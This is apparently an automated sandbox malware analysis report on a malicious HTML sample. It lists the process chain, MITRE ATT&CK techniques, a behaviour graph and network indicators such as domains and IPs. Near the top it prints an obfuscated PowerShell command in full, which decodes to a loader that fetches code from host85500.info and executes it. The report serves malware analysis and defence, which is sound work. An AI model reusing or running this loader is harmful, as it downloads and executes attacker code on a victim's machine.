Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($ksjqtmc = $('{5}{4}{1}' -f $('uxhxeilt'.tochararray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($ksjqtmc) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($ksjqtmc = $('{5}{4}{1}' -f $('uxhxeilt'.tochararray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($ksjqtmc) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
Valid Accounts11
Command and Scripting Interpreter
111
Scripting
111
Process Injection
21
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell
Logon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials13
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1607145 Sample: CfF7MWq7aG Startdate: 05/02/2025 Architecture: WINDOWS Score: 92 54 s4.histats.com 2->54 56 host85500.info 2->56 68 Found suspicious ZIP file 2->68 70 Detected javascript redirector / loader 2->70 72 Downloads suspicious files via Chrome 2->72 74 5 other signatures 2->74 11 chrome.exe 60 2->11         started        signatures3 process4 dnsIp5 58 192.168.2.4, 138, 15322, 443 unknown unknown 11->58 60 192.168.2.24 unknown unknown 11->60 62 239.255.255.250 unknown Reserved 11->62 44 C:\Users\user\...\CfF7MWq7aG.zip (copy), Zip 11->44 dropped 46 C:\Windows\...behaviorgraphoogle.Widevine.CDM.dll, PE32+ 11->46 dropped 15 unarchiver.exe 4 11->15         started        17 chrome.exe 11->17         started        file6 process7 dnsIp8 20 cmd.exe 2 2 15->20         started        23 7za.exe 2 15->23         started        48 54.39.156.32, 443, 49739, 49748 OVHFR Canada 17->48 50 host85500.info 45.93.9.167, 15322, 49740, 49741 VMAGE-ASRU Russian Federation 17->50 52 3 other IPs or domains 17->52 process9 file10 76 Wscript starts Powershell (via cmd or directly) 20->76 78 Obfuscated command line found 20->78 26 wscript.exe 14 20->26         started        29 conhost.exe 20->29         started        42 C:\Users\user\AppData\...\2025010453906.vbs, ASCII 23->42 dropped 31 conhost.exe 23->31         started        signatures11 process12 signatures13 80 System process connects to network (likely due to code injection or exploit) 26->80 82 Wscript starts Powershell (via cmd or directly) 26->82 84 Obfuscated command line found 26->84 86 2 other signatures 26->86 33 cmd.exe 1 26->33         started        process14 signatures15 64 Wscript starts Powershell (via cmd or directly) 33->64 66 Obfuscated command line found 33->66 36 powershell.exe 15 17 33->36         started        38 conhost.exe 33->38         started        40 cmd.exe 1 33->40         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
CfF7MWq7aG.html0%ReversingLabs
CfF7MWq7aG.html0%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\Google.Widevine.CDM.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://emv-qr.googleplex.com/.0%Avira URL Cloudsafe
https://www.motorola.com.br/checkout/#/payment0%Avira URL Cloudsafe
https://www.cobasi.com.br/checkout/review.0%Avira URL Cloudsafe
https://checkout-new.dafiti.com.br/success/index.html.0%Avira URL Cloudsafe
https://comprasegura.olx.com.br/pedidos/.0%Avira URL Cloudsafe
https://www.paodeacucar.com/checkout.0%Avira URL Cloudsafe
https://www.zzmall.com.br/checkout/order-confirmation/.0%Avira URL Cloudsafe
https://www.hurb.com/br/pay/checkout/.0%Avira URL Cloudsafe
https://comprasegura.olx.com.br/0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
host85500.info
45.93.9.167
truefalse
    unknown
    s4.histats.com
    142.4.219.198
    truefalse
      high
      www.google.com
      142.250.186.36
      truefalse
        high
        _15322._https.host85500.info
        unknown
        unknownfalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://wieistmeineip.desets.json.0.drfalse
            high
            https://mercadoshops.com.cosets.json.0.drfalse
              high
              https://gliadomain.comsets.json.0.drfalse
                high
                https://poalim.xyzsets.json.0.drfalse
                  high
                  https://comprasegura.olx.com.br/pedidos/.optimization-hints.pb.0.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://mercadolivre.comsets.json.0.drfalse
                    high
                    https://easylist.to/)LICENSE.txt.0.drfalse
                      high
                      https://reshim.orgsets.json.0.drfalse
                        high
                        https://nourishingpursuits.comsets.json.0.drfalse
                          high
                          https://medonet.plsets.json.0.drfalse
                            high
                            https://unotv.comsets.json.0.drfalse
                              high
                              https://mercadoshops.com.brsets.json.0.drfalse
                                high
                                https://joyreactor.ccsets.json.0.drfalse
                                  high
                                  https://zdrowietvn.plsets.json.0.drfalse
                                    high
                                    https://johndeere.comsets.json.0.drfalse
                                      high
                                      https://songstats.comsets.json.0.drfalse
                                        high
                                        https://baomoi.comsets.json.0.drfalse
                                          high
                                          https://supereva.itsets.json.0.drfalse
                                            high
                                            https://elfinancierocr.comsets.json.0.drfalse
                                              high
                                              https://www.motorola.com.br/checkout/#/paymentoptimization-hints.pb.0.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://bolasport.comsets.json.0.drfalse
                                                high
                                                https://rws1nvtvt.comsets.json.0.drfalse
                                                  high
                                                  https://www.cobasi.com.br/checkout/review.optimization-hints.pb.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://desimartini.comsets.json.0.drfalse
                                                    high
                                                    https://hearty.appsets.json.0.drfalse
                                                      high
                                                      https://emv-qr.googleplex.com/.optimization-hints.pb.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://hearty.giftsets.json.0.drfalse
                                                        high
                                                        https://mercadoshops.comsets.json.0.drfalse
                                                          high
                                                          https://heartymail.comsets.json.0.drfalse
                                                            high
                                                            https://nlc.husets.json.0.drfalse
                                                              high
                                                              https://www.paodeacucar.com/checkout.optimization-hints.pb.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://p106.netsets.json.0.drfalse
                                                                high
                                                                https://radio2.besets.json.0.drfalse
                                                                  high
                                                                  https://finn.nosets.json.0.drfalse
                                                                    high
                                                                    https://hc1.comsets.json.0.drfalse
                                                                      high
                                                                      https://kompas.tvsets.json.0.drfalse
                                                                        high
                                                                        https://mystudentdashboard.comsets.json.0.drfalse
                                                                          high
                                                                          https://songshare.comsets.json.0.drfalse
                                                                            high
                                                                            https://smaker.plsets.json.0.drfalse
                                                                              high
                                                                              https://mercadopago.com.mxsets.json.0.drfalse
                                                                                high
                                                                                https://www.zzmall.com.br/checkout/order-confirmation/.optimization-hints.pb.0.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://p24.husets.json.0.drfalse
                                                                                  high
                                                                                  https://talkdeskqaid.comsets.json.0.drfalse
                                                                                    high
                                                                                    https://24.husets.json.0.drfalse
                                                                                      high
                                                                                      https://mercadopago.com.pesets.json.0.drfalse
                                                                                        high
                                                                                        https://cardsayings.netsets.json.0.drfalse
                                                                                          high
                                                                                          https://text.comsets.json.0.drfalse
                                                                                            high
                                                                                            https://mightytext.netsets.json.0.drfalse
                                                                                              high
                                                                                              https://pudelek.plsets.json.0.drfalse
                                                                                                high
                                                                                                https://hazipatika.comsets.json.0.drfalse
                                                                                                  high
                                                                                                  https://joyreactor.comsets.json.0.drfalse
                                                                                                    high
                                                                                                    https://cookreactor.comsets.json.0.drfalse
                                                                                                      high
                                                                                                      https://wildixin.comsets.json.0.drfalse
                                                                                                        high
                                                                                                        https://eworkbookcloud.comsets.json.0.drfalse
                                                                                                          high
                                                                                                          https://cognitiveai.rusets.json.0.drfalse
                                                                                                            high
                                                                                                            https://nacion.comsets.json.0.drfalse
                                                                                                              high
                                                                                                              https://checkout-new.dafiti.com.br/success/index.html.optimization-hints.pb.0.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://chennien.comsets.json.0.drfalse
                                                                                                                high
                                                                                                                https://drimer.travelsets.json.0.drfalse
                                                                                                                  high
                                                                                                                  https://s4.histats.com/wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://deccoria.plsets.json.0.drfalse
                                                                                                                      high
                                                                                                                      https://mercadopago.clsets.json.0.drfalse
                                                                                                                        high
                                                                                                                        https://talkdeskstgid.comsets.json.0.drfalse
                                                                                                                          high
                                                                                                                          https://naukri.comsets.json.0.drfalse
                                                                                                                            high
                                                                                                                            https://interia.plsets.json.0.drfalse
                                                                                                                              high
                                                                                                                              https://bonvivir.comsets.json.0.drfalse
                                                                                                                                high
                                                                                                                                https://carcostadvisor.besets.json.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://salemovetravel.comsets.json.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://sapo.iosets.json.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://wpext.plsets.json.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.natura.com.br/pedido-concluido/.optimization-hints.pb.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://welt.desets.json.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://poalim.sitesets.json.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://drimer.iosets.json.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://infoedgeindia.comsets.json.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://blackrockadvisorelite.itsets.json.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://cognitive-ai.rusets.json.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://comprasegura.olx.com.br/optimization-hints.pb.0.drfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://cafemedia.comsets.json.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://graziadaily.co.uksets.json.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://thirdspace.org.ausets.json.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://mercadoshops.com.arsets.json.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://smpn106jkt.sch.idsets.json.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://elpais.uysets.json.0.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://landyrev.comsets.json.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.hurb.com/br/pay/checkout/.optimization-hints.pb.0.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://the42.iesets.json.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://commentcamarche.comsets.json.0.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://tucarro.com.vesets.json.0.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://rws3nvtvt.comsets.json.0.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://eleconomista.netsets.json.0.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://helpdesk.comsets.json.0.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://s4.histats.com/stawscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1839127825.000000000313A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://mercadolivre.com.brsets.json.0.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://clmbtech.comsets.json.0.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://standardsandpraiserepurpose.comsets.json.0.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://07c225f3.onlinesets.json.0.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://salemovefinancial.comsets.json.0.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://mercadopago.com.brsets.json.0.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://zoom.ussets.json.0.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                142.250.186.36
                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                54.39.156.32
                                                                                                                                                                                                unknownCanada
                                                                                                                                                                                                16276OVHFRtrue
                                                                                                                                                                                                142.4.219.198
                                                                                                                                                                                                s4.histats.comCanada
                                                                                                                                                                                                16276OVHFRfalse
                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                45.93.9.167
                                                                                                                                                                                                host85500.infoRussian Federation
                                                                                                                                                                                                44676VMAGE-ASRUfalse
                                                                                                                                                                                                IP
                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                192.168.2.24
                                                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                Analysis ID:1607145
                                                                                                                                                                                                Start date and time:2025-02-05 07:55:35 +01:00
                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                Overall analysis duration:0h 6m 41s
                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                Number of analysed new started processes analysed:17
                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                Sample name:CfF7MWq7aG.html
                                                                                                                                                                                                (renamed file extension from none to html, renamed because original name is a hash value)
                                                                                                                                                                                                Original Sample Name:9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc
                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                Classification:mal92.phis.expl.evad.winHTML@50/41@15/7
                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                • Successful, ratio: 50%
                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                • Number of executed functions: 45
                                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 172.217.23.99, 142.250.185.142, 173.194.76.84, 172.217.16.206, 142.250.184.238, 142.250.185.238, 172.217.18.10, 216.58.212.170, 172.217.16.202, 142.250.74.202, 142.250.184.234, 142.250.185.106, 216.58.206.42, 142.250.185.170, 142.250.185.202, 142.250.185.74, 142.250.185.234, 216.58.206.74, 142.250.185.138, 142.250.186.42, 142.250.181.234, 216.58.212.138, 199.232.210.172, 2.23.77.188, 216.58.212.174, 142.250.186.46, 142.250.186.110, 216.58.206.78, 142.250.186.142, 142.250.181.227, 34.104.35.123, 142.250.185.174, 142.250.186.174, 216.58.206.67, 142.250.185.110, 2.18.97.153, 20.12.23.50, 13.107.246.44
                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
                                                                                                                                                                                                • Execution Graph export aborted for target wscript.exe, PID 6884 because there are no executed function
                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                01:56:45API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                01:57:08API Interceptor3757209x Sleep call for process: unarchiver.exe modified
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                142.4.219.198http://www.meherald.com.au/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                • sstatic1.histats.com/0.gif?4786559&101
                                                                                                                                                                                                239.255.255.250http://80.64.30.238/evix.xllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  https://westallisheating.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                    https://webmaix.luxanday.com/auth.html?sync=info@unanigeria.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      https://harmonyagro.com.br/.well-known/vvx/dloasayudaenespanol-labor@maryland.govGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        Jjswaste Pr0ject.svgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          https://www.flipsnack.com/B77C9F5569B/sys-mac-automation-engineering-pte-ltd/full-view.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            https://app.powerbi.com/view?r=eyJrIjoiMDA2ZDU1NjAtYWIzNS00NWI5LThmZjQtZGNkNzUzYjk3YWJhIiwidCI6IjE1MWMxNjZlLWM3ZWEtNGI1ZC1hMjQ3LTNkMTAyNTEzY2IwMyJ9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              https://app.getbeamer.com/product7064/en/american-tradeshow-services-document-info-A6xyYY2PGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                http://kb.xilitharne.ruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  https://exclusivasarteca.com/paypay-loginGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    54.39.156.32https://templates.rjuuc.edu.npGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      http://jinoodle-polopol.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                        https://suman006723213.github.io/garena.reward.ff/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            https://l.facebook.com/l.php?u=https%3A%2F%2Fusapress.info%2Finside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years%2F%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR0r3IVxCUPtQPPqP5Ce0_adoAsiHgG3Oy1cYDq3k1JXBIrTGLtjToxlazM_aem_q02YsKkKY0QB_fm5suzUDw&h=AT1Xo_CkNlagO29_sds-m5zdTBZ6-H70m0J__7wjjmSNinwNGqBfRUFK3cH2zXJWNO7msrJPRkNulrkTmUCLkRNMcfCJTNK-cs4SfUQyRy7nw3vP1DNmFisBvlttaen8fHfi-N3lXN_BGQgdBw&__tn__=R%5D-R&c%5B0%5D=AT3euz91upHKeMVK8p24ktUFKClJ0GKt_3lJnV9tGakx0Tro3u7Ymk1z4tOG4eBZxcuD-Ny10eAla4iUyfdG04Fh4GryHwAMuELGG4dQctfWKiu4mfB-eLJ8Qktnq0ptzD_TaZEPEMHQnvP4W65jDpc-XBmWlMSmaRM-2soPhaPGYAODWegqP8h47S90Q2hmwQvQgUDdb35OgV1duzzqudMAyOk7e8E7mfpnrlwhIvWwUkK53AUNuPTqYkQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              https://ole798.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  odbior_1000731867755U.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    http://palestinehelpcentre.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                      https://santemur.click/call/jqtfbrsyzbGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        s4.histats.comhttps://getwellslogsnowonline.vercel.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 149.56.240.132
                                                                                                                                                                                                                                        https://fooofooofooo.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                                        • 149.56.240.127
                                                                                                                                                                                                                                        El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 149.56.240.129
                                                                                                                                                                                                                                        http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 54.39.128.162
                                                                                                                                                                                                                                        http://jinoodle-polopol.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                                        • 149.56.240.27
                                                                                                                                                                                                                                        https://eightdays-pdfnow.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                                        • 149.56.240.130
                                                                                                                                                                                                                                        http://nomads-primes-pdfs.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                                        • 149.56.240.27
                                                                                                                                                                                                                                        https://suman006723213.github.io/garena.reward.ff/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 149.56.240.27
                                                                                                                                                                                                                                        https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 158.69.254.144
                                                                                                                                                                                                                                        https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 149.56.240.127
                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        OVHFRhttps://westallisheating.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                        • 51.81.55.251
                                                                                                                                                                                                                                        Bank Slip pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                                        • 54.39.129.84
